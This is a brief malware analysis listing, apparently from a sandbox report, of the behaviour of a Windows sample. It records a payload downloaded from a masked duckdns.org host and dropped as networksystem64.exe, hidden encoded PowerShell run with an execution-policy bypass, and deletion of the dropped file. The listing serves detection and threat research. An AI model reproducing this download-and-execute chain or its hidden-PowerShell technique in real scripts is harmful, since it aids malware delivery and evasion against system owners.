Technical Information
- http://dn####.duckdns.org/www.exe as %appdata%\networksystem64.exe
- %WINDIR%\syswow64\chkdsk.exe
- %APPDATA%\networksystem64.exe
- http://dn####.duckdns.org/www.exe
- DNS ASK dn####.duckdns.org
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%APPDATA%\networksystem64.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' POWeRSHeLL.ExE -ex ByPAss -Nop -w 1 -eC KAAJACAACQAJAAkAIAAJACAACQAmACgAJwBOAGUAVwAtAG8AYgAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' POWeRSHeLL.ExE -ex ByPAss -Nop -w 1 -eC KAAJACAACQAJAAkAIAAJACAACQAmACgAJwBOAGUAVwAtAG8AYgAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA...
- '%WINDIR%\syswow64\chkdsk.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%APPDATA%\networksystem64.exe"